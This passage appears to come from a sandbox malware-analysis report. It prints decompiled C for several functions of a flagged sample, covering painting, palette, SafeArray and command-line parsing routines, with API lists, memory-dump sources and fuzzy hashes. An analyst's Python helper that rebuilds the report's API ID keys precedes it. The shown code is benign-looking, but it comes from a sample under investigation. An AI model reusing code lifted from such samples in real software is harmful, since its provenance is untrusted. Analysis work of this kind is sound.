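    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            d = m.groupdict()
            d["args"] = d["args"].split(",") if d["args"] else []
            calls.append(d)
    return calls


def split_words(api_name):
    """'SetDIBColorTable' -> ['Set', 'DIB', 'Color', 'Table']."""
    return CAMEL.findall(api_name)


def api_id(api_names):
    """Bag-of-words key: words grouped by call count, frequent group first,
    '$' between groups, alphabetical inside a group (inferred rule)."""
    counts = Counter(
        w for n in api_names for w in split_words(n) if len(w) >= MIN_WORD
    )
    groups = {}
    for word, c in counts.items():
        groups.setdefault(c, []).append(word)
    return "$".join("".join(sorted(groups[c])) for c in sorted(groups, reverse=True))


# Sample input: the two "APIs" blocks from the listings above.
PALETTE_FUNC_APIS = """
  • Part of subcall function 004267F4: GetObjectA.GDI32(?,00000004), ref: 0042680B
  • Part of subcall function 004267F4: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 0042682E
• GetDC.USER32(00000000), ref: 00428F76
• CreateCompatibleDC.GDI32(?), ref: 00428F82
• SelectObject.GDI32(?), ref: 00428F8F
• SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00428FE7,?,?,?,?,00000000), ref: 00428FB3
• SelectObject.GDI32(?,?), ref: 00428FCD
• DeleteDC.GDI32(?), ref: 00428FD6
• ReleaseDC.USER32 ref: 00428FE1
"""

CURSOR_FUNC_APIS = """
• GetCursorPos.USER32 ref: 0045872F
• WindowFromPoint.USER32(?,?), ref: 0045873C
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0045874A
• GetCurrentThreadId.KERNEL32 ref: 00458751
• SendMessageA.USER32(00000000,00000084,00000000,00000000), ref: 0045876A
• SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00458781
• SetCursor.USER32(00000000), ref: 00458793
"""


def api_id_for_block(text):
    """Parse a report 'APIs' block and return its rebuilt API ID."""
    return api_id(c["api"] for c in parse_api_lines(text))


if __name__ == "__main__":
    for label, block in (("palette", PALETTE_FUNC_APIS), ("cursor", CURSOR_FUNC_APIS)):
        calls = parse_api_lines(block)
        modules = sorted({c["module"] for c in calls})
        print(f"{label}: {len(calls)} calls from {modules}")
        print("  API ID:", api_id_for_block(block))
```

Because the key ignores call order, argument values and addresses, two functions that touch the same GDI or USER32 surface collide on it even when their control flow differs, so treat a shared API ID as a reason to compare Opcode and Instruction fuzzy hashes, not as proof of identical code.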

                                                    C-Code - Quality: 89%
                                                    			E00454268(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                    				intOrPtr* _v8;
                                                    				intOrPtr* _v12;
                                                    				struct HDC__* _v16;
                                                    				struct tagPAINTSTRUCT _v80;
                                                    				struct tagRECT _v96;
                                                    				struct tagRECT _v112;
                                                    				signed int _v116;
                                                    				long _v120;
                                                    				void* __ebp;
                                                    				void* _t68;
                                                    				void* _t94;
                                                    				struct HBRUSH__* _t97;
                                                    				intOrPtr _t105;
                                                    				void* _t118;
                                                    				void* _t127;
                                                    				intOrPtr _t140;
                                                    				intOrPtr _t146;
                                                    				void* _t147;
                                                    				void* _t148;
                                                    				void* _t150;
                                                    				void* _t152;
                                                    				intOrPtr _t153;
                                                    
                                                    				_t148 = __esi;
                                                    				_t147 = __edi;
                                                    				_t138 = __edx;
                                                    				_t127 = __ebx;
                                                    				_t150 = _t152;
                                                    				_t153 = _t152 + 0xffffff8c;
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				_t68 =  *_v12 - 0xf;
                                                    				if(_t68 == 0) {
                                                    					_v16 =  *(_v12 + 4);
                                                    					if(_v16 == 0) {
                                                    						 *(_v12 + 4) = BeginPaint( *(_v8 + 0x254),  &_v80);
                                                    					}
                                                    					_push(_t150);
                                                    					_push(0x454436);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t153;
                                                    					if(_v16 == 0) {
                                                    						GetWindowRect( *(_v8 + 0x254),  &_v96);
                                                    						E0043AAC0(_v8,  &_v120,  &_v96);
                                                    						_v96.left = _v120;
                                                    						_v96.top = _v116;
                                                    						L004398B8( *(_v12 + 4),  ~(_v96.top),  ~(_v96.left));
                                                    					}
                                                    					E0043F3B8(_v8, _t127, _v12, _t147, _t148);
                                                    					_pop(_t140);
                                                    					 *[fs:eax] = _t140;
                                                    					_push(0x454444);
                                                    					if(_v16 == 0) {
                                                    						return EndPaint( *(_v8 + 0x254),  &_v80);
                                                    					}
                                                    					return 0;
                                                    				} else {
                                                    					_t94 = _t68 - 5;
                                                    					if(_t94 == 0) {
                                                    						_t97 = E00425610( *((intOrPtr*)(_v8 + 0x170)));
                                                    						 *((intOrPtr*)( *_v8 + 0x44))();
                                                    						FillRect( *(_v12 + 4),  &_v112, _t97);
                                                    						if( *((char*)(_v8 + 0x22f)) == 2 &&  *(_v8 + 0x254) != 0) {
                                                    							GetClientRect( *(_v8 + 0x254),  &_v96);
                                                    							FillRect( *(_v12 + 4),  &_v96, E00425610( *((intOrPtr*)(_v8 + 0x170))));
                                                    						}
                                                    						_t105 = _v12;
                                                    						 *((intOrPtr*)(_t105 + 0xc)) = 1;
                                                    					} else {
                                                    						_t118 = _t94 - 0x2b;
                                                    						if(_t118 == 0) {
                                                    							E004541DC(_t150);
                                                    							_t105 = _v8;
                                                    							if( *((char*)(_t105 + 0x22f)) == 2) {
                                                    								if(E00454704(_v8) == 0 || E00454228(_t138, _t150) == 0) {
                                                    									_t146 = 1;
                                                    								} else {
                                                    									_t146 = 0;
                                                    								}
                                                    								_t105 = E0045152C( *(_v8 + 0x254), _t146);
                                                    							}
                                                    						} else {
                                                    							if(_t118 != 0x45) {
                                                    								_t105 = E004541DC(_t150);
                                                    							} else {
                                                    								E004541DC(_t150);
                                                    								_t105 = _v12;
                                                    								if( *((intOrPtr*)(_t105 + 0xc)) == 1) {
                                                    									_t105 = _v12;
                                                    									 *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff;
                                                    								}
                                                    							}
                                                    						}
                                                    					}
                                                    					return _t105;
                                                    				}
                                                    			}
                                                    Address column (one entry per line of the C-code above): 0x00454268 0x00454268 0x00454268 0x00454268 0x00454269 0x0045426b 0x0045426e 0x00454271 0x00454279 0x0045427c 0x0045438c 0x00454393 0x004543ab 0x004543ab 0x004543b0 0x004543b1 0x004543b6 0x004543b9 0x004543c0 0x004543d0 0x004543de 0x004543e6 0x004543ec 0x004543ff 0x004543ff 0x0045440a 0x00454411 0x00454414 0x00454417 0x00454420 0x00000000 0x00454430 0x00454435 0x00454282 0x00454282 0x00454285 0x004542c5 0x004542d3 0x004542e1 0x004542f0 0x0045430c 0x0045432b 0x0045432b 0x00454330 0x00454333 0x00454287 0x00454287 0x0045428a 0x00454340 0x00454346 0x00454350 0x00454360 0x00454371 0x0045436d 0x0045436d 0x0045436d 0x0045437c 0x0045437c 0x00454290 0x00454293 0x0045443e 0x00454299 0x0045429a 0x004542a0 0x004542a7 0x004542ad 0x004542b0 0x004542b0 0x004542a7 0x00454293 0x0045428a 0x00454447 0x00454447

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Rect$FillPaintWindow$BeginCallClientProc
                                                    • String ID:
                                                    • API String ID: 901200654-0
                                                    • Opcode ID: 4b1a317fca31308ac4e10fac1f961552a80ef8e38a36b5d2d8db9195fd6bbfc6
                                                    • Instruction ID: 131b90634cb33abbaab8d9433d3d521d828b3d7b247f4d7e968007ff8c91c40e
                                                    • Opcode Fuzzy Hash: 4b1a317fca31308ac4e10fac1f961552a80ef8e38a36b5d2d8db9195fd6bbfc6
                                                    • Instruction Fuzzy Hash: 4651F075E04108EFCB00DB99C549E9DB7F8AB49319F5485A6E808EB352D738AE85DB08
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 77%
                                                    			E00410B94(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
                                                    				char _v260;
                                                    				char _v768;
                                                    				char _v772;
                                                    				short* _v776;
                                                    				intOrPtr _v780;
                                                    				char _v784;
                                                    				signed int _v788;
                                                    				signed short* _v792;
                                                    				char _v796;
                                                    				char _v800;
                                                    				intOrPtr* _v804;
                                                    				void* __ebp;
                                                    				signed char _t47;
                                                    				signed int _t54;
                                                    				void* _t62;
                                                    				intOrPtr* _t73;
                                                    				intOrPtr* _t91;
                                                    				void* _t93;
                                                    				void* _t95;
                                                    				void* _t98;
                                                    				void* _t99;
                                                    				intOrPtr* _t108;
                                                    				void* _t112;
                                                    				intOrPtr _t113;
                                                    				char* _t114;
                                                    				void* _t115;
                                                    
                                                    				_t100 = __ecx;
                                                    				_v780 = __ecx;
                                                    				_t91 = __edx;
                                                    				_v776 = __eax;
                                                    				if(( *(__edx + 1) & 0x00000020) == 0) {
                                                    					E00410638(0x80070057);
                                                    				}
                                                    				_t47 =  *_t91;
                                                    				if((_t47 & 0x00000fff) != 0xc) {
                                                    					_push(_t91);
                                                    					_push(_v776);
                                                    					L0040F328();
                                                    					return E00410638(_v776);
                                                    				} else {
                                                    					if((_t47 & 0x00000040) == 0) {
                                                    						_v792 =  *((intOrPtr*)(_t91 + 8));
                                                    					} else {
                                                    						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
                                                    					}
                                                    					_v788 =  *_v792 & 0x0000ffff;
                                                    					_t93 = _v788 - 1;
                                                    					if(_t93 < 0) {
                                                    						L9:
                                                    						_push( &_v772);
                                                    						_t54 = _v788;
                                                    						_push(_t54);
                                                    						_push(0xc);
                                                    						L0040F784();
                                                    						_t113 = _t54;
                                                    						if(_t113 == 0) {
                                                    							E00410390(_t100);
                                                    						}
                                                    						E004109E8(_v776);
                                                    						 *_v776 = 0x200c;
                                                    						 *((intOrPtr*)(_v776 + 8)) = _t113;
                                                    						_t95 = _v788 - 1;
                                                    						if(_t95 < 0) {
                                                    							L14:
                                                    							_t97 = _v788 - 1;
                                                    							if(E00410B08(_v788 - 1, _t115) != 0) {
                                                    								L0040F79C();
                                                    								E00410638(_v792);
                                                    								L0040F79C();
                                                    								E00410638( &_v260);
                                                    								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
                                                    							}
                                                    							_t62 = E00410B38(_t97, _t115);
                                                    						} else {
                                                    							_t98 = _t95 + 1;
                                                    							_t73 =  &_v768;
                                                    							_t108 =  &_v260;
                                                    							do {
                                                    								 *_t108 =  *_t73;
                                                    								_t108 = _t108 + 4;
                                                    								_t73 = _t73 + 8;
                                                    								_t98 = _t98 - 1;
                                                    							} while (_t98 != 0);
                                                    							do {
                                                    								goto L14;
                                                    							} while (_t62 != 0);
                                                    							return _t62;
                                                    						}
                                                    					} else {
                                                    						_t99 = _t93 + 1;
                                                    						_t112 = 0;
                                                    						_t114 =  &_v772;
                                                    						do {
                                                    							_v804 = _t114;
                                                    							_push(_v804 + 4);
                                                    							_t18 = _t112 + 1; // 0x1
                                                    							_push(_v792);
                                                    							L0040F78C();
                                                    							E00410638(_v792);
                                                    							_push( &_v784);
                                                    							_t21 = _t112 + 1; // 0x1
                                                    							_push(_v792);
                                                    							L0040F794();
                                                    							E00410638(_v792);
                                                    							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
                                                    							_t112 = _t112 + 1;
                                                    							_t114 = _t114 + 8;
                                                    							_t99 = _t99 - 1;
                                                    						} while (_t99 != 0);
                                                    						goto L9;
                                                    					}
                                                    				}
                                                    			}

                                                    APIs
                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00410C2D
                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00410C49
                                                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00410C82
                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00410CFF
                                                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 00410D18
                                                    • VariantCopy.OLEAUT32(?,00000000), ref: 00410D4D
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                    • String ID:
                                                    • API String ID: 351091851-0
                                                    • Opcode ID: 186572999e7babe0e9bb68bc67f471013412e5678f21bde4cccaa072d4ecc509
                                                    • Instruction ID: 003888812708ca8383a4c1960096dd24bca7936a94d77342cebcc1c5295c8c4e
                                                    • Opcode Fuzzy Hash: 186572999e7babe0e9bb68bc67f471013412e5678f21bde4cccaa072d4ecc509
                                                    • Instruction Fuzzy Hash: 7551FE7590121D9FCB66DB59C981BD9B3BCAF4C304F4041EAE508E7202D678AFC58FA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 95%
                                                    			E0041CE2C(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                    				intOrPtr* _v8;
                                                    				char _v12;
                                                    				char _v16;
                                                    				void* _t36;
                                                    				void* _t49;
                                                    				CHAR* _t50;
                                                    				void* _t60;
                                                    				void* _t71;
                                                    				char _t72;
                                                    				char _t73;
                                                    				intOrPtr _t88;
                                                    				CHAR* _t91;
                                                    				CHAR** _t94;
                                                    				void* _t95;
                                                    				void* _t96;
                                                    				void* _t97;
                                                    				intOrPtr _t98;
                                                    
                                                    				_t96 = _t97;
                                                    				_t98 = _t97 + 0xfffffff4;
                                                    				_v16 = 0;
                                                    				_t71 = __edx;
                                                    				_v8 = __eax;
                                                    				_t94 =  &_v12;
                                                    				 *[fs:eax] = _t98;
                                                    				L0041BEF0(_v8);
                                                    				 *[fs:eax] = _t98;
                                                    				 *((intOrPtr*)( *_v8 + 0x44))( *[fs:eax], 0x41cf5e, _t96,  *[fs:eax], 0x41cf7b, _t96, __edi, __esi, __ebx, _t95);
                                                    				 *_t94 = E00404E80(_t71);
                                                    				while( *( *_t94) - 0xffffffffffffffe1 < 0) {
                                                    					 *_t94 = CharNextA( *_t94);
                                                    				}
                                                    				while(1) {
                                                    					_t72 =  *( *_t94);
                                                    					if(_t72 == 0) {
                                                    						break;
                                                    					}
                                                    					_t36 = E0041CFA4(_v8);
                                                    					__eflags = _t72 - _t36;
                                                    					if(_t72 != _t36) {
                                                    						_t91 =  *_t94;
                                                    						while(1) {
                                                    							_t73 =  *( *_t94);
                                                    							__eflags = _t73 - 0x20;
                                                    							if(_t73 <= 0x20) {
                                                    								break;
                                                    							}
                                                    							_t60 = E0041CF8C(_v8);
                                                    							__eflags = _t73 - _t60;
                                                    							if(_t73 != _t60) {
                                                    								 *_t94 = CharNextA( *_t94);
                                                    								continue;
                                                    							}
                                                    							break;
                                                    						}
                                                    						__eflags =  *_t94 - _t91;
                                                    						E00404AB0( &_v16,  *_t94 - _t91, _t91,  *_t94 - _t91);
                                                    					} else {
                                                    						E004091D4(_t94,  &_v16, E0041CFA4(_v8));
                                                    					}
                                                    					 *((intOrPtr*)( *_v8 + 0x38))();
                                                    					while(1) {
                                                    						__eflags =  *( *_t94) - 0xffffffffffffffe1;
                                                    						if( *( *_t94) - 0xffffffffffffffe1 >= 0) {
                                                    							break;
                                                    						}
                                                    						 *_t94 = CharNextA( *_t94);
                                                    					}
                                                    					_t49 = E0041CF8C(_v8);
                                                    					__eflags = _t49 -  *( *_t94);
                                                    					if(_t49 ==  *( *_t94)) {
                                                    						_t50 = CharNextA( *_t94);
                                                    						__eflags =  *_t50;
                                                    						if( *_t50 == 0) {
                                                    							__eflags = 0;
                                                    							 *((intOrPtr*)( *_v8 + 0x38))();
                                                    						}
                                                    						do {
                                                    							 *_t94 = CharNextA( *_t94);
                                                    							__eflags =  *( *_t94) - 0xffffffffffffffe1;
                                                    						} while ( *( *_t94) - 0xffffffffffffffe1 < 0);
                                                    					}
                                                    				}
                                                    				_pop(_t88);
                                                    				 *[fs:eax] = _t88;
                                                    				_push(E0041CF65);
                                                    				return L0041BFAC(_v8);
                                                    			}

                                                    APIs
                                                    • CharNextA.USER32(?,?,00000000,0041CF7B), ref: 0041CE7C
                                                    • CharNextA.USER32(?,?,00000000,0041CF7B), ref: 0041CEF4
                                                    • CharNextA.USER32(?,?,00000000,0041CF7B), ref: 0041CF15
                                                    • CharNextA.USER32(00000000,?,?,00000000,0041CF7B), ref: 0041CF2C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CharNext
                                                    • String ID:
                                                    • API String ID: 3213498283-3916222277
                                                    • Opcode ID: 24b7eb0b41e4ee8e508986ba2351e00e2282b7539fe7d38dfc5498590e9056e5
                                                    • Instruction ID: 11efbd69cb5f73df2cbcf5fefe28e22a1c1bddc5dbaf51a38cd0fed122abd7e5
                                                    • Opcode Fuzzy Hash: 24b7eb0b41e4ee8e508986ba2351e00e2282b7539fe7d38dfc5498590e9056e5
                                                    • Instruction Fuzzy Hash: A1415130A44244DFCB11DF79C991999BBF6EF5A30472404AAF4C1D7392C738AD82DB99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 81%
                                                    			E00426AA0(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, signed int* _a4, signed int* _a8) {
                                                    				intOrPtr* _v8;
                                                    				intOrPtr _v12;
                                                    				signed int _v16;
                                                    				intOrPtr _v20;
                                                    				signed int _v24;
                                                    				signed int _v32;
                                                    				struct HDC__* _v44;
                                                    				signed int* _t36;
                                                    				signed int _t39;
                                                    				signed int _t42;
                                                    				signed int* _t52;
                                                    				signed int _t56;
                                                    				intOrPtr _t66;
                                                    				void* _t72;
                                                    				void* _t73;
                                                    				void* _t74;
                                                    				intOrPtr _t75;
                                                    
                                                    				_t73 = _t74;
                                                    				_t75 = _t74 + 0xffffff90;
                                                    				_v16 = __ecx;
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				_t52 = _a8;
                                                    				_v24 = _v16 << 4;
                                                    				_v20 = E00408D24(_v24, __eflags);
                                                    				 *[fs:edx] = _t75;
                                                    				_t56 = _v24;
                                                    				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:edx], 0x426d97, _t73, __edi, __esi, __ebx, _t72);
                                                    				if(( *_t52 | _t52[1]) != 0) {
                                                    					_t36 = _a4;
                                                    					 *_t36 =  *_t52;
                                                    					_t36[1] = _t52[1];
                                                    				} else {
                                                    					 *_a4 = GetSystemMetrics(0xb);
                                                    					_a4[1] = GetSystemMetrics(0xc);
                                                    				}
                                                    				_v44 = GetDC(0);
                                                    				if(_v44 == 0) {
                                                    					L00425F64(_t56);
                                                    				}
                                                    				_push(_t73);
                                                    				_push(0x426b89);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t75;
                                                    				_t39 = GetDeviceCaps(_v44, 0xe);
                                                    				_t42 = _t39 * GetDeviceCaps(_v44, 0xc);
                                                    				if(_t42 <= 8) {
                                                    					__eflags = 1;
                                                    					_v32 = 1 << _t42;
                                                    				} else {
                                                    					_v32 = 0x7fffffff;
                                                    				}
                                                    				_pop(_t66);
                                                    				 *[fs:eax] = _t66;
                                                    				_push(0x426b90);
                                                    				return ReleaseDC(0, _v44);
                                                    			}

                                                    APIs
                                                    • GetSystemMetrics.USER32 ref: 00426AEE
                                                    • GetSystemMetrics.USER32 ref: 00426AFA
                                                    • GetDC.USER32(00000000), ref: 00426B16
                                                    • GetDeviceCaps.GDI32(00000000,0000000E), ref: 00426B3D
                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00426B4A
                                                    • ReleaseDC.USER32 ref: 00426B83
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CapsDeviceMetricsSystem$Release
                                                    • String ID:
                                                    • API String ID: 447804332-0
                                                    • Opcode ID: fe6f9d9fad2ee4ecbfc1d9d7efc59859acc1fc1413ed063bf02da4aa932c8209
                                                    • Instruction ID: 72199b77af9d5ad6b2438074c355ca19ed48f1e35d4323483afc0bacfeaa441d
                                                    • Opcode Fuzzy Hash: fe6f9d9fad2ee4ecbfc1d9d7efc59859acc1fc1413ed063bf02da4aa932c8209
                                                    • Instruction Fuzzy Hash: 90316F74E00214AFEB00EF65C841AAEBBF5FB49750F51856AE814AB394C638A941CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 67%
                                                    			E00426F10(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, struct HPALETTE__* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
                                                    				char _v5;
                                                    				struct HPALETTE__* _v12;
                                                    				struct HDC__* _v16;
                                                    				struct tagBITMAPINFO* _t36;
                                                    				intOrPtr _t43;
                                                    				struct HBITMAP__* _t47;
                                                    				void* _t50;
                                                    
                                                    				_t36 = __ecx;
                                                    				_t47 = __eax;
                                                    				E00426DC0(__eax, _a4, __ecx);
                                                    				_v12 = 0;
                                                    				_v16 = CreateCompatibleDC(0);
                                                    				_push(_t50);
                                                    				_push(0x426fad);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t50 + 0xfffffff4;
                                                    				if(__edx != 0) {
                                                    					_v12 = SelectPalette(_v16, __edx, 0);
                                                    					RealizePalette(_v16);
                                                    				}
                                                    				_v5 = GetDIBits(_v16, _t47, 0, _t36->bmiHeader.biHeight, _a8, _t36, 0) != 0;
                                                    				_pop(_t43);
                                                    				 *[fs:eax] = _t43;
                                                    				_push(0x426fb4);
                                                    				if(_v12 != 0) {
                                                    					SelectPalette(_v16, _v12, 0);
                                                    				}
                                                    				return DeleteDC(_v16);
                                                    			}

                                                    0x00426f19
                                                    0x00426f1d
                                                    0x00426f26
                                                    0x00426f2d
                                                    0x00426f37
                                                    0x00426f3c
                                                    0x00426f3d
                                                    0x00426f42
                                                    0x00426f45
                                                    0x00426f4a
                                                    0x00426f58
                                                    0x00426f5f
                                                    0x00426f5f
                                                    0x00426f7d
                                                    0x00426f83
                                                    0x00426f86
                                                    0x00426f89
                                                    0x00426f92
                                                    0x00426f9e
                                                    0x00426f9e
                                                    0x00426fac

                                                    APIs
                                                      • Part of subcall function 00426DC0: GetObjectA.GDI32(?,00000054), ref: 00426DD4
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00426F32
                                                    • SelectPalette.GDI32(?,?,00000000), ref: 00426F53
                                                    • RealizePalette.GDI32(?), ref: 00426F5F
                                                    • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00426F76
                                                    • SelectPalette.GDI32(?,00000000,00000000), ref: 00426F9E
                                                    • DeleteDC.GDI32(?), ref: 00426FA7
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
                                                    • String ID:
                                                    • API String ID: 1221726059-0
                                                    • Opcode ID: cf66ecea4cbc03e348312b4209bf1e0b5033cbc5b509529efbc9ca410bba2e7b
                                                    • Instruction ID: 77de815d1256251625e09d43045054b0a879545964fd81c4b279a3d00da1559d
                                                    • Opcode Fuzzy Hash: cf66ecea4cbc03e348312b4209bf1e0b5033cbc5b509529efbc9ca410bba2e7b
                                                    • Instruction Fuzzy Hash: C2114F75F082047FDB10DBA9DC41F9EBBECEB48714F5284AAB914E7281D678A900C769
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00426750(void* __eax, signed int __ecx) {
                                                    				char _v1036;
                                                    				signed int _v1038;
                                                    				struct tagRGBQUAD _v1048;
                                                    				short _v1066;
                                                    				void* _t20;
                                                    				struct HDC__* _t25;
                                                    				void* _t28;
                                                    				void* _t31;
                                                    				struct HPALETTE__* _t33;
                                                    				LOGPALETTE* _t34;
                                                    
                                                    				_t31 = __eax;
                                                    				_t33 = 0;
                                                    				_t34->palVersion = 0x300;
                                                    				if(__eax == 0) {
                                                    					_v1038 = __ecx;
                                                    					E004029DC(_t28, __ecx << 2,  &_v1036);
                                                    				} else {
                                                    					_t25 = CreateCompatibleDC(0);
                                                    					_t20 = SelectObject(_t25, _t31);
                                                    					_v1066 = GetDIBColorTable(_t25, 0, 0x100,  &_v1048);
                                                    					SelectObject(_t25, _t20);
                                                    					DeleteDC(_t25);
                                                    				}
                                                    				if(_v1038 != 0) {
                                                    					if(_v1038 != 0x10 || E004266B8(_t34) == 0) {
                                                    						E00426548( &_v1036, _v1038 & 0x0000ffff);
                                                    					}
                                                    					_t33 = CreatePalette(_t34);
                                                    				}
                                                    				return _t33;
                                                    			}

                                                    0x00426759
                                                    0x0042675b
                                                    0x0042675d
                                                    0x00426765
                                                    0x0042679f
                                                    0x004267ad
                                                    0x00426767
                                                    0x0042676e
                                                    0x00426772
                                                    0x0042678b
                                                    0x00426792
                                                    0x00426798
                                                    0x00426798
                                                    0x004267b8
                                                    0x004267c0
                                                    0x004267d6
                                                    0x004267d6
                                                    0x004267e3
                                                    0x004267e3
                                                    0x004267f0

                                                    APIs
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00426769
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00426772
                                                    • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,0042A2D3,?,?,?,?,00428DD3), ref: 00426786
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00426792
                                                    • DeleteDC.GDI32(00000000), ref: 00426798
                                                    • CreatePalette.GDI32 ref: 004267DE
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
                                                    • String ID:
                                                    • API String ID: 2515223848-0
                                                    • Opcode ID: 0bb8fb8edcdc7087e5e3f325450ea8167a7ed7ac943ba32b5a45adc2cc887e54
                                                    • Instruction ID: efc5091b96ee346cfcb1bb7471c8c7bb22fdf2c070b44c7d61a8e62d02ab9fa2
                                                    • Opcode Fuzzy Hash: 0bb8fb8edcdc7087e5e3f325450ea8167a7ed7ac943ba32b5a45adc2cc887e54
                                                    • Instruction Fuzzy Hash: 8701847160832061E2246766AC43A6B72AC9FC0758F41882FB988A72C1E67C9845D3AB
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00406B91(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
                                                    				long _t11;
                                                    				void* _t16;
                                                    
                                                    				_t16 = __ebx;
                                                    				_t2 = __eax - 0x49e5bc;
                                                    				 *__edi =  *__edi + __ecx;
                                                    				 *((intOrPtr*)(__eax - 0x49e5bc)) =  *((intOrPtr*)(__eax - 0x49e5bc)) + __eax - 0x49e5bc;
                                                    				 *0x49b00c = 2;
                                                    				 *0x49e014 = 0x40124c;
                                                    				 *0x49e018 = 0x40125c;
                                                    				 *0x49e04e = 2;
                                                    				 *0x49e000 = 0x405998;
                                                    				if(L00403A2C(_t2) != 0) {
                                                    					_t3 = L00403A5C();
                                                    				}
                                                    				L00403B20(_t3);
                                                    				 *0x49e054 = 0xd7b0;
                                                    				 *0x49e220 = 0xd7b0;
                                                    				 *0x49e3ec = 0xd7b0;
                                                    				 *0x49e040 = GetCommandLineA();
                                                    				 *0x49e03c = E004013AC();
                                                    				if((GetVersion() & 0x80000000) == 0x80000000) {
                                                    					 *0x49e5c0 = E00406AC8(GetThreadLocale(), _t16, __eflags);
                                                    				} else {
                                                    					if((GetVersion() & 0x000000ff) <= 4) {
                                                    						 *0x49e5c0 = E00406AC8(GetThreadLocale(), _t16, __eflags);
                                                    					} else {
                                                    						 *0x49e5c0 = 3;
                                                    					}
                                                    				}
                                                    				_t11 = GetCurrentThreadId();
                                                    				 *0x49e034 = _t11;
                                                    				return _t11;
                                                    			}

                                                    0x00406b91
                                                    0x00406b91
                                                    0x00406b96
                                                    0x00406b9b
                                                    0x00406b9d
                                                    0x00406ba4
                                                    0x00406bae
                                                    0x00406bb8
                                                    0x00406bbf
                                                    0x00406bd0
                                                    0x00406bd2
                                                    0x00406bd2
                                                    0x00406bd7
                                                    0x00406bdc
                                                    0x00406be5
                                                    0x00406bee
                                                    0x00406bfc
                                                    0x00406c06
                                                    0x00406c1a
                                                    0x00406c53
                                                    0x00406c1c
                                                    0x00406c2a
                                                    0x00406c42
                                                    0x00406c2c
                                                    0x00406c2c
                                                    0x00406c2c
                                                    0x00406c2a
                                                    0x00406c58
